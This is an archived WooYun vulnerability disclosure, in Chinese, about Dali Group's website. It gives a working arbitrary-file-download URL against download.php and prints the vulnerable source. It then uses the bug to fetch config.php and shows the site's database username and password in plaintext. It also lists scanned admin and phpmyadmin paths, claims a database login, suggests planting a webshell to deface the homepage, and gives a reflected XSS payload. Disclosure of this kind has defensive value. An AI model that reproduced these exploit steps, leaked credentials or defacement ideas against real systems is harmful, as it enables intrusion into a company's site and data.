乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-11: 厂商已经确认,细节仅向厂商公开 2015-12-21: 细节向核心白帽子及相关领域专家公开 2015-12-31: 细节向普通白帽子公开 2016-01-10: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
晚上饿了,可比克薯片味道还是不错滴。怎么也是达利集团的?达利集团诞生于历史文化名城、东亚文化之都泉州。自1989年创办至今,历经二十余载飞速发展,达利集团已成长为收益过百亿位列中国民营企业500强的综合性现代化食品企业集团。达利集团根据行业特征,精心布局,在全国16个省区建立18家子公司共30个食品、饮料生产基地,1个马铃薯全粉生产基地,1家包装彩印公司,同时,集团构建享誉业界的黄金销售渠道,组成了覆盖全国的营销网络。达利集团专注食品行业,形成食品、饮料两大支柱齐头并进的产业结构。以大平台、高密度、立体化的品牌推广模式,提升品牌形象,旗下“达利园”糕点类、“好吃点”饼干类、“可比克”薯片类三大品牌,已成为公认的中国休闲食品领导品牌,“和其正”凉茶、“达利园”花生牛奶、“乐虎”功能饮料,在各自行业处于领先地位。多产业多品牌的发展战略,使达利集团成为在食品和饮料行业都具有超大规模与超强实力的企业。
e.g:http://**.**.**.**/download.php?filename=download.php
<?phpdefine('IN_W3CWEB',true);require(dirname(__FILE__) . '/include/global.php');$filename = $config['siteRoot'].$_GET['filename'];//文件下载//readfile$fileinfo = pathinfo($filename);header('Content-type: application/x-'.$fileinfo['extension']);header('Content-Disposition: attachment; filename='.$fileinfo['basename']);header('Content-Length: '.filesize($filename));readfile($filename);exit();?>
可下载网站目录下任意源代码源代码
跑到以下目录
http://**.**.**.**:80/admin/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/images/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/old/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/include/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/admin/admin.php HTTP/1.1 200 OKhttp://**.**.**.**:80/index.php HTTP/1.1 200 OKhttp://**.**.**.**:80/phpmyadmin/index.php HTTP/1.1 200 OKhttp://**.**.**.**:80/data/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/phpmyadmin/ HTTP/1.1 200 OKhttp://**.**.**.**:80/phpmyadmin/db_create.php HTTP/1.1 200 OKhttp://**.**.**.**:80/admin/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/ HTTP/1.1 200 OKhttp://**.**.**.**:80/manage.php HTTP/1.1 200 OKhttp://**.**.**.**:80/download.php HTTP/1.1 200 OKhttp://**.**.**.**:80/data/ HTTP/1.1 403 Forbiddenhttp://**.**.**.**:80/include/ HTTP/1.1 403 Forbidden
发现phpmyadmin 通过源码下载http://**.**.**.**/download.php?filename=/data/config.php
<?php// database type$db_type = "mysqli";// database host$db_host = "**.**.**.**";// database name$db_name = "daligroupcom";// database username$db_user = "daligroupcom";// database password$db_pass = 'cndaligroup123456';$dsn1 = "$db_type://$db_user:$db_pass@$db_host/$db_name";$timezone = "Asia/Chongqing";$cookie_path = "/";$cookie_domain = "";$session = "1440";$upload_pic_dir="upload/temppic";$html_dir = "html";$data_dir = "data";$if_html = 1;$shtml_cache_time ="2";$config['BASE_URL']="http://**.**.**.**/";$config['adminpagename'] ="manage.php";$config['now_time'] =time();$config['cookie_pre'] ="benz_";$config['cookie_path'] ="/";$config['cookie_domain']="";$config['siteRoot'] = substr(dirname(__file__),0,-4);$config['atturl']='ATTACHMENT';$config['attdir']=$config['siteRoot'].'/'.$config['atturl'];$config['cacheurl']='data/cache/';$config['cachedir']=$config['siteRoot'].'/'.$config['cacheurl'];// table prefix$prefix = "w3c_";$table_admin =$prefix."admin";$table_ads =$prefix."ads";$table_ads_position =$prefix."ads_position";$table_article =$prefix."article";$table_articles =$prefix."articles";$table_config =$prefix."config";$table_category =$prefix."category";$table_goods =$prefix."goods";$table_goods_result =$prefix."goods_result";$table_goods_tracelog =$prefix."goods_tracelog";$table_icate =$prefix."icate";$table_join =$prefix."join";$table_job =$prefix."job";//$_G['global']['sex']=array("M"=>"男","W"=>"女");$_G['global']['JobLng']=array("cn"=>"中文","en"=>"英文");//question$_G['global']['article_channel']=array("0"=>"无","1"=>"首页","2"=>"二级频道");$_G['global']['article_showstyle']=array("0"=>"列表","1"=>"轮播图","2"=>"红标题","3"=>"单独图片","4"=>"图片/标题","5"=>"图片/标题/简介","6"=>"图片/简介");?>
连上数据库
传马可以修改主页哦!
XSS
http://**.**.**.**/activity.php?artid=&cid=44%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/xss/)%3C/ScRiPt%3E
XSS有好几处,建议开发人员对类似的参数处理进行过滤
乌云百度权重是5达利集团的权重也是4啊,访问的人数不少的,
。东西好吃必须滴,安全问题也要跟上!求高rank,或者杰伦签名~
download.php源码,你们看着办。 xss 过滤。
危害等级:中
漏洞Rank:10
确认时间:2015-12-11 18:10
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无